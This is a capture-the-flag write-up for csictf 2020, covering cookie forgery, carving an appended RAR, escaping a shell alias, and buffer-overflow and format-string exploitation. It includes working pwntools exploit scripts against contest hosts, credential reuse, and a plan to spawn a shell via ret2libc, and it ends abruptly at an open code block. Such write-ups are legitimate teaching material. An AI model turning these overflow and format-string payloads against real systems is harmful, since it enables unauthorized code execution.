csictf 2020: Write up
Web
oreo
The nephew apparently wants a chocolate Oreo.
flavour: c3RyYXdiZXJyeQ==
Looking at the HTTP request, the cookie named flavour carries a base64-encoded string.
```
kali@kali:~$ echo -n 'c3RyYXdiZXJyeQ==' | base64 -d
strawberry
```
Decoding it gives strawberry, so all we have to do is replace it with chocolate, base64-encode that and send the request with the new cookie. The server trusts whatever the client puts in the cookie; base64 is an encoding, not a protection.
```
kali@kali:~$ echo -n 'chocolate' | base64
Y2hvY29sYXRl
```
```
% curl -H 'Cookie: flavour=Y2hvY29sYXRl' http://chall.csivit.com:30243/
csictf{1ick_twi5t_dunk}
```
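The cookie swap above, together with the server-side fix it implies, as an added example that is not part of the original write-up. `forge_flavour` reproduces the two base64 steps; `sign_cookie`/`verify_cookie` and the `SECRET` key are my own constructed illustration of why a bare base64 cookie is an authorization bypass and why an HMAC tag over the value stops it.

```python
import base64
import hashlib
import hmac

# Cookie value seen in the challenge request: base64("strawberry")
OBSERVED_COOKIE = "c3RyYXdiZXJyeQ=="


def forge_flavour(cookie_value, new_flavour):
    """Decode the base64 cookie, return (current flavour, re-encoded replacement)."""
    current = base64.b64decode(cookie_value).decode()
    forged = base64.b64encode(new_flavour.encode()).decode()
    return current, forged


# --- the fix: bind the cookie to a server-side secret -------------------------
# Constructed key for this example; a real server would load it from configuration.
SECRET = b"server-side-secret-never-sent-to-the-client"


def sign_cookie(value, key=SECRET):
    """value -> base64(value).hexHMAC-SHA256(value); the client cannot forge the tag."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(value.encode()).decode() + "." + tag


def verify_cookie(signed, key=SECRET):
    """Return the flavour if the tag matches, else None (tampered or malformed)."""
    try:
        b64, tag = signed.rsplit(".", 1)
        value = base64.b64decode(b64, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return value


if __name__ == "__main__":
    current, forged = forge_flavour(OBSERVED_COOKIE, "chocolate")
    print("server sees:", current)
    print("curl -H 'Cookie: flavour=%s' http://chall.csivit.com:30243/" % forged)
    signed = sign_cookie("strawberry")
    tampered = forged + "." + signed.split(".", 1)[1]   # swap the value, keep the old tag
    print("signed cookie accepted:", verify_cookie(signed))
    print("tampered cookie accepted:", verify_cookie(tampered))
```

Against the challenge the forged value is exactly the `Y2hvY29sYXRl` used in the curl request; against the signed variant the same edit fails verification because the tag no longer matches the decoded value.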
FORENSICS
Gradient sky
```
$ binwalk sky.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, little-endian offset of first image directory: 8
918           0x396           JPEG image data, JFIF standard 1.01
295038        0x4807E         RAR archive data, version 5.x
```
Checking with binwalk whether anything is embedded in the image shows a RAR archive appended at offset 295038.
```
$ dd if=sky.jpg of=sky.rar skip=295038 ibs=1
95+0 records in
0+1 records out
95 bytes copied, 0.000171087 s, 555 kB/s
```
Extract it with dd (ibs=1 makes skip count bytes, so everything from offset 295038 to the end of the file is copied out).
```
$ ls
sky.jpg  sky.rar
```
```
$ unrar x sky.rar

UNRAR 5.61 beta 1 freeware      Copyright (c) 1993-2018 Alexander Roshal

Extracting from sky.rar

Extracting  ls.txt                                                    OK
All OK
```
```
$ cat ls.txt
csictf{j0ker_w4snt_happy}
```
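The same carve done by hand, as an added example that is not part of the original write-up: scan a file for RAR signatures, cut from the hit to end of file (what the `dd ... skip=OFFSET ibs=1` above does) and check that the archive really sits after the image's end-of-image marker. The sample bytes in `build_sample` are constructed, not sky.jpg.

```python
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"   # RAR 5.x signature (what binwalk reported)
RAR4_MAGIC = b"Rar!\x1a\x07\x00"       # RAR 1.5 - 4.x signature
JPEG_SOI = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"


def find_embedded(data, magics=(RAR5_MAGIC, RAR4_MAGIC)):
    """Return sorted (offset, magic) pairs for every archive signature found in data."""
    hits = []
    for magic in magics:
        start = 0
        while True:
            i = data.find(magic, start)
            if i < 0:
                break
            hits.append((i, magic))
            start = i + 1
    return sorted(hits)


def carve_trailing(data, offset):
    """Equivalent of `dd if=file of=out skip=offset ibs=1`: bytes from offset to EOF."""
    return data[offset:]


def appended_after_image(data, offset):
    """True if a JPEG end-of-image marker precedes the hit, i.e. the archive was glued
    onto a complete image rather than living inside a JPEG segment."""
    if not data.startswith(JPEG_SOI):
        return False
    eoi = data.rfind(JPEG_EOI, 0, offset)
    return eoi != -1 and eoi + len(JPEG_EOI) <= offset


def build_sample():
    """Constructed stand-in for sky.jpg: a minimal JPEG-looking blob with a RAR5 header appended."""
    jpeg = JPEG_SOI + b"\xe0" + b"\x00" * 100 + JPEG_EOI
    rar = RAR5_MAGIC + b"\x00" * 87      # 95 bytes, the size dd reported above
    return jpeg + rar


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for off, magic in find_embedded(data):
        print("0x%x: %r, after image: %s" % (off, magic, appended_after_image(data, off)))
        blob = carve_trailing(data, off)
        open("carved_%x.rar" % off, "wb").write(blob)
        print("wrote %d bytes" % len(blob))
```

`binwalk -e sky.jpg` would carve the same region automatically; doing it explicitly is useful when the signature is inside a container the extractor does not understand, or when you want to confirm that nothing of the image was cut along with the archive.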
LINUX
AKA
```
$ nc chall.csivit.com 30611
user @ csictf: $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
user @ csictf: $ ls
 ________________________________________
/ Don't look at me, I'm just here to say \
\ moo.                                   /
 ----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
user @ csictf: $ bash -i
ls
flag.txt  script.sh  start.sh
cat flag.txt
csictf{1_4m_cl4rk3_k3nt}
```
ls has been replaced by a cowsay alias (hence the challenge name); starting a fresh interactive bash gives a shell in which ls behaves normally, and flag.txt can be read.
find32
The task was to connect to the server over ssh and find the flag.
```
user1@find32-f54b9d779-bwcv9:~$ ls
02KG7GI3 4LMTFZCM 80TD6MQ1 BH13PMF2 FOGK2TD9 JL8V5YGI M45WG887 OVB0C2DD ST1FTYFZ W56UYZUK 02M95EZJ 4LYTO0ZG 82R7NE45 BP1QOD2S FPLW13DY JM035B27 M4PSP87C OXNCWNKP STYTHKQE W7N3EQ8A 041Q5VQ6 4NE1DLAV 84XR0NUK BRKQC7KI FUF4GEJ2 JMXU733Y M50MK22L P7U25CJI SWD8ZKVQ W8XHJP69 0K8HTQUI 4O0KVR5P 89JKXHMI BT4Q0KSC G18VV3XH JNTGVLSL M6MO9M1W P7ZSATBS SXRZ25DU WFLCEXOU 0L51GUQ6 4UOCNFI8 8AYM8OQ9 BUIYBJW6 G20VWPOJ JQJIA3QC M8XE7P73 P8H2QJZE T0ST0WFT WHYUOJS2 0POE7NLS 4VTQDZXG 8BHHDOCA BW90182E G4DRQMVC JSWT0A61 MAC4PGYS PBMIEOJ1 T5D06H6O WO7DKKIR 0XC8TJL6 526KAB1Q 8DCJBGN8 BZE1NCWY GBIA0FJJ JW5DHBI2 MDZE1NQC PF2KOY3A THW3C7CC WQYZVZ02 10KS7XSL 5669QKVZ 8O23G30S C1KDRW2G GCCH7GUL JYP14B13 MIN0CJNB PJU5YNCE TIE17JV7 WW5L7JNK 17HSIYXQ 5714I59N 8Q8IDTC7 C5L2LOAA GGK14ZEP K5HIYP7U MITS1KT3 PKEIXGTL TNGM39LQ WXW4GEDU 1DB6A3RZ 5D8MSKXV 8SQP2JFV C75ZYB8Q GN72VYNY K7H88QI2 MLNCZNJH PLE8FFL4 TNNLXAMK X1SVRUTM 1EBY9SNN 5DNAUH8Z 90ORMN66 C7LAWJCM GVAUVIPU K80WPMFB MLRX5NHC PM7NRHP0 TOD5ZOWV X23268R9 1TE2UPR9 5DY1KZDZ 931P2T2C C9EN38OZ GVTHMJMC K8670JAD MT0ZF01M PMWQY71J TP72DLYC X44EBTIV 1VQPZIUO 5E0OD9MJ 95NBR36B CB7VL2AM H782K0GF KDT49C2O MVYJ08ZU PN7VNWMY TQYI4JH2 X4O9C3E9 1W6RAWEU 5FOOLY10 99KWRIDG CR8AY5W7 H7PWE6D1 KJ26BDR0 MWE4SJWL PRIT98R2 TY2N5W2V X70F203P 21X763CW 5HQTP051 9EO10QRH CVDGAH14 HI1HXC9E KOIIQDDB N56AGDMY PUKTT71A TZ4TM4KC XA6HG1VW 24CHFLCM 5OWRFEZT 9KHTQSOG CYNFLG1O HJ7SLXWJ KQFVQJ3J N8O0W1UR PX7XX8MV U1HE6HJU XAGJI6C3 24UQMOA7 5S7QF3H6 9KQEWTD4 D01U0OA5 HKX85U5A KRNKFQTK N9ZX32OP PXR9X9H1 U1Z144SU XBJ59Z81 2FFS4207 5ZCQW7TK 9KVDBM8O DC953402 HL9OQ59W KRTDDSYK NDR9IE07 Q3VV2P04 U4CT6S3M XESS84R7 2L9WVOQA 66SLWGGM 9LNZ0ETP DHI6XKWG HTFON23U KTE9QN31 NGT5TVLI QBZ2NYYY U9KXZUZT XM6M6XV3 2MMNROKS 6IGISUOK 9MP89P4E DQZAE7MY HW9ZGUI0 KUNZ9OP2 NJJ4FIMD QDDZKQBI UFF3VJES XVXM67UN 2X82259Q 6IS45I48 9QNUXM4L DVRULQ4L HWR8ILW8 L25P2X6S NMMNMEDT QDZM9GU3 UFRWO7LV XZ5KZZPR 31H6U39X 6JFHFM48 9R6FWLZQ E2DCKTAW I0GJ1ZT2 L6RJI5MH NNGY3F51 QON3WELD
UI3CYXEH Y0WAA0QK 32DJSRCD 6JJ8M6EQ 9SMDHC89 E2WWNK1U I0HK3F0Q L97LN1SA NQ3BFZKH QV763DK6 UK268DBR Y2F5YYPT 36VMK9BG 6KPKMW7F 9TM8NR4D E3VMO1UV I3QH2SGS L9HIBPO9 NTIJFZDS QXKDIR8P UMVACDSG Y41T1L0P 3B2F652L 6NZ8YTHN 9UGJX4Z2 EBGAB2T7 I7BE5SNQ L9NCYUOA NWAG08DF QYBFIDQA UOKCOUPN YB6CGUEN 3C71HLAH 6O893R7P 9X0BSFFX EDL1IX5Y I7BYYSUH LA28D194 NXH2E4FB QYKLAVOR USP8NX9I YGAD81HL 3CWSG1VM 6TQAQ9JL 9YN7B5TM EJKM4P8J IHGA1LHQ LB4B6X6P O08K936H QZBKI0LI UTNI6PSD YI5ISTTI 3E7ZTAVL 6Y96J42D A202VRDJ EMAPY1SV INUIDPFZ LDMDGEL4 O20W8JF2 R3O1QJRE V8A4PPEG YI9VPU71 3FSO4YLX 71PCO4II A8DWWULS EMOTUDML ISW6FLPB LF6NHZRK O8C1K8CS R513RF7X VCSYBT6V YJ4H3LH9 3MPI6ZGG 74EIPRM5 A9ARPBTE EPIGX1NO IUKF08Y4 LIVI4VP2 OA9OWQNN R75LDKZA VFFKFKFP YJPL7KY5 3NI0KD8T 784MLE5E AK1L1RB0 EUXTE3IX IW0M1T97 LKLQLQ8B OAVKKSIU RHZ4QIGE VL8QUY6U YLTYQ7PT 3O7SZPP5 79VJFIU5 AK6PZX3H EXVHNHYF IXLBEBRX LKUM0ZLZ OB0TZRYT RSA9B4XA VOAZ2FLA YZOFT123 3SF18NHO 7EA2V52Y AL2HOE1I EYN874N3 IYLAWPCR LP29J6MU OHGWT0IT RXHHGT3D VQHX8Y2S Z8TPG2SQ 3WJNQHOI 7IKIFVQC ATP6Z1LV F4K726ZE IYT9TNZ3 LQWDHMT1 OI290XGJ RYRXFTD0 VS2QLP5T ZE0LYP1J 3Y6ULSYJ 7JKVQ1V4 AYHI7FZG F5FFWSP3 J634H910 LR9H9RJ4 OJTT5YOZ S3CQF12S VS5RKUTC ZIIFJZRE 40HE4X61 7K2HS4Y8 AZBQ6DI4 F9T58X71 J9K0N1G3 LS1E6E8N OLHQ2XMI S50ORS2M VU7UXE91 ZKOYMDBL 41W0HO2L 7O0E74NI AZF6YNNW FH0FGQU9 JBNLA5LS M0ODDGTQ OM4BZRJ6 S9796BM8 VUU3IP28 ZOM1L6RA 4DXWEUAK 7QQAKH41 BAL0FX4Y FI9WZ1NI JCUBGZ0L M2D9A9GW OO08I86R SA13FEFE VWXNPY8W ZUIZ3BRS 4E5VZT6C 7UB67288 BDMSPZFU FJATAT6I JD8K3921 M2W3FH21 OPTKWTEN SGCS15D7 VYXH92ZI ZXWG1CJB 4FMGJMPX 7UYWYDBZ BDYM2DL3 FMZXZWMD JDVT05Q1 M40WA6L0 OTQLM9FR SSNMEO7G W569XUGK ZYSF9F0A
```
Logging in as user1, the home directory is full of files, so as a first step I grep all of them for csictf.
```
$ grep --color=always "csictf" *
(snip)
csictf{not_the_flag}{user2:AAE976A5232713355D58584CFE5A5}WOQS75G7TVPTTN3RBXGK96HGINKCRZ1Z8JP6N44KC02C9E8QWWTA2HW61CHPMKIZEZ6MYFR7N2WKVK93G5NBFEYYIGLUVXWK8NB3OZ06NLJVLRL6AXEXCYV6Z00CMPDPA7TU0G2CCRI5XNEEZQ79ZKC8B9WF0R79KX5X0EO0SVR8DLK7A5E4ZUO0A4ZYSP3DMENRTSIYRBP77ENRO94R3YWYGV154YX23Z6GY9V4U1ARL3PDFU6XO9RZOLJEJ1XXRR97HRV6TBSITPQ563V7GAAQSAPVY01KD8OSOQ1A78NJN0U4LRQN2ONQ0RTNO51W3227SH1BRGKC1SF9J8N72PMYIKMNJLE1XIH36AR3XU22NRTBTWOKEL9S1JT0THW0YF8MGC22RUERM34LLBI6B0EVMZKTE231NH9LTJBMKIABUXQ9CVZWTGIM2PFUNDFZVJSG14WO8W5FCJ1G6H1VXM1HP8Z92LY98JSYW2WDTHZVWF2AWZGTIY3OIOK0SEVIUOZT1Z41QS0C3W7FTRJEOZ3V3NDY517A48030C1362BNZHSZXYOF1CMANHQ408M9FF5R2Z9HC5BCDSKFLHAB3YFJ414WXCIOSPSY18323WYJL2FG0JHJA1ULW3M1KB4VXNWOV6MYU5YV88WJ8L03OO6738R50LI8XKHFR0TDVSFNEVRG95LBPMNUMRLP315YU6JMK4H5IF4B1P4N1J5YATTL6FFU9EMH99XUPEWXHH8TOZ4LBEFKGBS0LJMBRA6HULPB147O4DWNUALAOYY3VTXEUUT6CQL48PBB65AOU88UXDS5GHANP9A2XKF1MRRFTHJWLNEP3TMSK61ETIY82OS6GRYFQ5A6PXAVIWCSNT1H5CBBBDP9E2UOEVQBOOI2U27RQY4UU5QEY6GX75E72RO7RYESFMQR14LT1IS605XI4J5U7TYZN6NCIN2HH2WWU
```
csictf{not_the_flag}{user2:AAE976A5232713355D58584CFE5A5}
csictf{not_the_flag} is not the flag, but {user2:AAE976A5232713355D58584CFE5A5} looks like a credential for user2, so I switch to the user2 account with it.
```
user2@find32-55bc4b84d5-zgx7k:~$ ls -al
total 3708
drwxr-x--- 1 root user2   4096 Jul 17 23:09 .
drwxr-xr-x 1 root root    4096 Jul 19 03:50 ..
-rwxr-x--- 1 root user2 756782 Jul 17 23:08 adgsfdgasf.d
-rwxr-x--- 1 root user2 756782 Jul 17 23:08 fadf.x
-rwxr-x--- 1 root user2 756782 Jul 17 23:08 janfjdkn.txt
-rwxr-x--- 1 root user2 756782 Jul 17 23:08 notflag.txt
-rwxr-x--- 1 root user2 756798 Jul 17 23:08 sadsas.tx
```
user2's home directory contains several files.
Only sadsas.tx has a different size (16 bytes larger than the others). Diffing it against one of the other files shows a single extra line with a flag-looking string, and that was the flag.
```
user2@find32-55bc4b84d5-zgx7k:~$ diff notflag.txt sadsas.tx
42391a42392
> th15_15_unu5u41
```
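The three steps above (grep for the flag format and pull the credential token out of the hit, find the file whose size is the odd one out, list the lines it has that its siblings lack) as an added example that is not part of the original write-up. The file contents in `USER1_FILES` and `USER2_FILES` are constructed; only the file names and the decoy/credential string come from the listing above.

```python
import re
from collections import Counter

FLAG_RE = re.compile(rb"csictf\{[^}]*\}")
# Shape of the token that sat right after the decoy flag: {userN:HEX}
CRED_RE = re.compile(rb"\{(user\d+):([0-9A-F]+)\}")


def grep_all(files, pattern=FLAG_RE):
    """grep-equivalent over {name: bytes}: (name, matched bytes) for every hit."""
    return [(name, m.group(0)) for name, data in files.items() for m in pattern.finditer(data)]


def size_outlier(files):
    """Name of the one file whose size differs when every other file shares a size, else None."""
    sizes = Counter(len(data) for data in files.values())
    if len(sizes) != 2:
        return None
    (_, common_n), (rare, rare_n) = sizes.most_common()
    if rare_n != 1 or common_n < 2:
        return None
    return next(name for name, data in files.items() if len(data) == rare)


def extra_lines(base, other):
    """Lines `other` has beyond `base` (multiset difference, original order): what diff shows as '> line'.
    Linear time, unlike difflib, so it is fine on the 750 KB files from the challenge."""
    surplus = Counter(other.splitlines()) - Counter(base.splitlines())
    out = []
    for line in other.splitlines():
        if surplus[line] > 0:
            out.append(line)
            surplus[line] -= 1
    return out


# ---- constructed sample data -------------------------------------------------
USER1_FILES = {
    "02KG7GI3": b"WOQS75G7" * 4
                + b"csictf{not_the_flag}{user2:AAE976A5232713355D58584CFE5A5}"
                + b"TVPTTN3R" * 4,
    "02M95EZJ": b"ABCDEFGH" * 10,
}

_BASE = b"".join(b"line %05d\n" % i for i in range(100))
_rows = _BASE.splitlines(keepends=True)
_rows.insert(42, b"th15_15_unu5u41\n")
USER2_FILES = {
    "adgsfdgasf.d": _BASE,
    "fadf.x": _BASE,
    "janfjdkn.txt": _BASE,
    "notflag.txt": _BASE,
    "sadsas.tx": b"".join(_rows),
}


if __name__ == "__main__":
    print("flag-shaped hits:", grep_all(USER1_FILES))
    print("credential tokens:", grep_all(USER1_FILES, CRED_RE))
    odd = size_outlier(USER2_FILES)
    print("size outlier:", odd)
    print("extra lines:", extra_lines(USER2_FILES["notflag.txt"], USER2_FILES[odd]))
```

On the real box `ls -l | sort -k5 -n` or `md5sum * | sort` gets you the outlier just as quickly; the point of `extra_lines` is that it does not depend on the files being line-aligned the way `diff` assumes.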
PWN
pwn intended 0x1
A plain buffer overflow (any sufficiently long input) was enough to get the flag.
pwn intended 0x2
```
$ file pwn-intended-0x2
pwn-intended-0x2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3fe5fe06984f7093c9122fb1b08fb834a63784d4, for GNU/Linux 3.2.0, not stripped
```
```
$ checksec ./pwn-intended-0x2
[*] '/home/kali/csi_ctf_2020/pwn_intended_0x2/pwn-intended-0x2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
```
```
   0x00000000004011ad <+87>:    lea    rax,[rbp-0x30]
   0x00000000004011b1 <+91>:    mov    rdi,rax
   0x00000000004011b4 <+94>:    mov    eax,0x0
   0x00000000004011b9 <+99>:    call   0x401060 <gets@plt>
   0x00000000004011be <+104>:   lea    rdi,[rip+0xe6c]        # 0x402031
   0x00000000004011c5 <+111>:   call   0x401030 <puts@plt>
   0x00000000004011ca <+116>:   cmp    DWORD PTR [rbp-0x4],0xcafebabe
   0x00000000004011d1 <+123>:   jne    0x4011f0 <main+154>
   0x00000000004011d3 <+125>:   lea    rdi,[rip+0xe66]        # 0x402040
   0x00000000004011da <+132>:   call   0x401030 <puts@plt>
   0x00000000004011df <+137>:   lea    rdi,[rip+0xe8a]        # 0x402070
   0x00000000004011e6 <+144>:   mov    eax,0x0
   0x00000000004011eb <+149>:   call   0x401050 <system@plt>
```
Debugging in gdb shows that gets reads input into the buffer at rbp-0x30 (with no length limit), then the dword at rbp-0x4 is compared with 0xcafebabe, and if it matches, system is called. The local at rbp-0x4 lies above the buffer, so 0x30-0x4 = 44 bytes of filler followed by 0xcafebabe (little-endian) overwrite it.
```
gdb-peda$ p/d 0x30-0x4
$1 = 44
```
```
$ python solve.py
[*] '/home/kali/csi_ctf_2020/pwn_intended_0x2/pwn-intended-0x2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to chall.csivit.com on port 30007: Done
[*] Switching to interactive mode
Welcome to csictf! Where are you headed?
Safe Journey! You've reached your destination, here's a flag!
csictf{c4n_y0u_re4lly_telep0rt?}
```
pwn intended 0x3
```
$ file pwn-intended-0x3
pwn-intended-0x3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=65cafe283997ada7631398451f05273dd0002567, for GNU/Linux 3.2.0, not stripped
```
```
$ checksec ./pwn-intended-0x3
[*] '/home/kali/csi_ctf_2020/pwn_intended_0x3/pwn-intended-0x3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
```
gdb-peda$ pdisas flag
Dump of assembler code for function flag:
   0x00000000004011ce <+0>:     push   rbp
   0x00000000004011cf <+1>:     mov    rbp,rsp
   0x00000000004011d2 <+4>:     lea    rdi,[rip+0xe5f]        # 0x402038
   0x00000000004011d9 <+11>:    call   0x401030 <puts@plt>
   0x00000000004011de <+16>:    lea    rdi,[rip+0xe7b]        # 0x402060
   0x00000000004011e5 <+23>:    call   0x401050 <system@plt>
   0x00000000004011ea <+28>:    mov    edi,0x0
   0x00000000004011ef <+33>:    call   0x401070 <exit@plt>
```
There is an unreferenced flag() function that calls system(), so this is a plain ret2win: overwrite the saved return address with its address. Since the binary is not PIE, the addresses are static.

```python
from pwn import *

e = ELF('./pwn-intended-0x3')
p = remote('chall.csivit.com', 30013)

flag_addr = e.symbols['flag']   # 0x4011ce, the function nothing calls
ret_addr = 0x0040101a           # a lone `ret` gadget: keeps rsp 16-byte aligned when flag() calls system()

payload = b'A' * 40             # 40 bytes reach the saved return address
payload += p64(ret_addr)
payload += p64(flag_addr)       # flag() runs after the extra ret
p.sendline(payload)
p.interactive()
```
```
$ python solve.py
[*] '/home/kali/csi_ctf_2020/pwn_intended_0x3/pwn-intended-0x3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to chall.csivit.com on port 30013: Done
[*] Switching to interactive mode
Welcome to csictf! Time to teleport again.
Well, that was quick. Here's your flag:
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive
```
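The two gets() overflows above (pwn intended 0x2 overwrites the checked local at rbp-0x4; pwn intended 0x3 overwrites the saved return address) modelled in one place, as an added example that is not part of the original write-up. The offsets, the 0xcafebabe constant, the ret gadget 0x40101a and flag() at 0x4011ce come from the disassembly and scripts above; the 0x20-byte buffer for 0x3 is my assumption, chosen so that buffer plus saved rbp equals the 40-byte filler in solve.py. `Frame` is a constructed model of the stack, not the binary.

```python
import struct
import sys


def p32(v):
    return struct.pack("<I", v)


def p64(v):
    return struct.pack("<Q", v)


# pwn intended 0x2: gets() writes at rbp-0x30, the compared local lives at rbp-0x4
def build_local_overwrite(buf_off=0x30, target_off=0x4, value=0xcafebabe):
    """Filler up to the target local, then the 4-byte value the cmp expects."""
    return b"A" * (buf_off - target_off) + p32(value)


# pwn intended 0x3: buffer (assumed 0x20 bytes) + 8 bytes saved rbp, then a lone `ret`
# so rsp is 16-byte aligned when flag() reaches system(), then flag() itself
def build_ret2win(buf_off=0x20, ret_gadget=0x40101a, target=0x4011ce):
    return b"A" * (buf_off + 8) + p64(ret_gadget) + p64(target)


def has_gets_badchars(payload):
    """gets() only stops at '\\n' (or EOF); NUL bytes are stored, which is why p64() addresses
    with zero high bytes work here. A strcpy()- or scanf("%s")-based bug would differ."""
    return b"\n" in payload


class Frame:
    """Model of the x86-64 frame gets() overflows: the buffer starts at rbp-buf_off, the saved rbp
    sits at rbp, the return address at rbp+8, and anything past that is the caller's stack."""

    def __init__(self, buf_off, payload):
        size = max(buf_off + 16, len(payload) + 1)
        self.buf_off = buf_off
        self.mem = bytearray(size)          # zero-filled: bytes the payload never reaches read as 0
        self.mem[:len(payload)] = payload   # gets() copies the whole line...
        self.mem[len(payload)] = 0          # ...and appends a NUL, clobbering one more byte

    def _u32(self, i):
        return struct.unpack("<I", self.mem[i:i + 4])[0]

    def _u64(self, i):
        return struct.unpack("<Q", self.mem[i:i + 8])[0]

    def local_u32(self, off):
        """dword at rbp-off, what `cmp DWORD PTR [rbp-0x4],...` reads."""
        return self._u32(self.buf_off - off)

    def saved_rbp(self):
        return self._u64(self.buf_off)

    def ret_addr(self):
        return self._u64(self.buf_off + 8)

    def stack_u64(self, k):
        """k-th qword above the return address: what the k-th `ret` in a chain pops next."""
        return self._u64(self.buf_off + 8 + 8 * k)


if __name__ == "__main__":
    # usage: python3 frame.py 0x2 | nc chall.csivit.com 30007
    which = sys.argv[1] if len(sys.argv) > 1 else "0x2"
    payload = build_local_overwrite() if which == "0x2" else build_ret2win()
    if has_gets_badchars(payload):
        sys.exit("payload contains a newline; gets() would cut it short")
    sys.stdout.buffer.write(payload + b"\n")
```

Walking the model before touching the service is the cheap check: for 0x2 the dword at rbp-4 must read back as 0xcafebabe while the return address stays untouched, for 0x3 the return address must be the `ret` gadget and the next qword flag().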
secret society
```
$ nc chall.csivit.com 30041
What is the secret phrase?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,csivit{Bu!!er_e3pl01ts_ar5_5asy}
```
global-warming
```
$ file global-warming
global-warming: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=a8349c997968a84bfa8b253e0f9a3f9349cc1538, for GNU/Linux 3.2.0, not stripped
```
```
$ checksec ./global-warming
[*] '/home/kali/csi_ctf_2020/Global_Warming/global-warming'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```
This was the most basic kind of format string bug (FSB) challenge: our input is passed to printf as the format string, and the goal is to write 0xb4dbabe3 into the global admin variable. Probing with AAAA%12$x shows the input buffer at argument index 12.
```python
from pwn import *

e = ELF('./global-warming')
#p = process('./global-warming')
p = remote('chall.csivit.com', 30023)

# argument index 12 is where our buffer lands (AAAA%12$x echoed 41414141);
# pwntools builds the %n writes that store 0xb4dbabe3 at &admin
payload = fmtstr_payload(12, {e.symbols['admin']: p32(0xb4dbabe3)})
p.sendline(payload)
p.interactive()
```
```
$ ./global-warming
AAAA%12$x
AAAA41414141
$ python solve.py
[*] '/home/kali/csi_ctf_2020/Global_Warming/global-warming'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to chall.csivit.com on port 30023: Done
[*] Switching to interactive mode
� ; \xb2 \x00-/.,
csictf{n0_5tr1ng5_@tt@ch3d}
```
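The AAAA%N$x probe above, automated, as an added example that is not part of the original write-up. `find_format_offset` is the loop you would run against the real process (here with the `%12$x` of global-warming and the `%1$x` of Smash below); `FakeTarget` is a constructed stand-in for `printf(buf)` on a 32-bit stack, so the search can be exercised offline.

```python
import re
import struct

FMT_RE = re.compile(rb"%(\d+)\$x")


class FakeTarget:
    """Constructed model of a 32-bit binary doing printf(buf). %N$x prints the N-th word above the
    format-string pointer; the first buf_index-1 words are other stack data, after that the
    stack holds our own input, 4 bytes per word. Only %N$x is interpreted."""

    def __init__(self, buf_index, junk_word=0x0badf00d):
        self.junk = [junk_word] * (buf_index - 1)

    def __call__(self, payload):
        padded = payload + b"\x00" * (-len(payload) % 4)
        words = self.junk + list(struct.unpack("<%dI" % (len(padded) // 4), padded))

        def sub(m):
            n = int(m.group(1))
            return b"%x" % words[n - 1] if 0 < n <= len(words) else b"(none)"

        return b"Hello, " + FMT_RE.sub(sub, payload) + b"!\n"


def find_format_offset(query, marker=b"AAAA", max_index=64):
    """Send marker%N$x for N = 1..max_index and return the first N whose output echoes the
    marker as hex (b'41414141' for AAAA). That N is the offset fmtstr_payload() needs."""
    want = b"%x" % struct.unpack("<I", marker)[0]
    for n in range(1, max_index + 1):
        if want in query(marker + b"%%%d$x" % n):
            return n
    return None


if __name__ == "__main__":
    # Replace FakeTarget with a function that restarts the process, sends the payload and
    # returns the reply, e.g. using pwntools process()/remote().
    print("global-warming-like layout:", find_format_offset(FakeTarget(12)))
    print("hello-like layout:", find_format_offset(FakeTarget(1)))
```

The probe assumes the marker starts on a 4-byte boundary; if the real output shows only part of it (for example 414141xx), pad the front of the input by one to three bytes and retry. For a 64-bit target use an 8-byte marker and `%N$lx`.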
Smash
```
$ file hello
hello: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b1b4310a5ac288241657cbfade8806251eeb2a87, not stripped
```
```
$ ./hello
What's your name?
AAAA%1$x
Hello, AAAA41414141!
```
The program has both a format string bug (our name is the format string, at argument index 1) and a stack overflow, and the matching libc.so.6 is provided. The plan: use the format string write to point free's GOT entry at _start so the program restarts instead of exiting; then use the overflow for a ret2plt call to printf with printf's GOT entry as argument, which leaks printf's libc address; compute the libc base from that, and finally overflow again to call system("/bin/sh").
```python
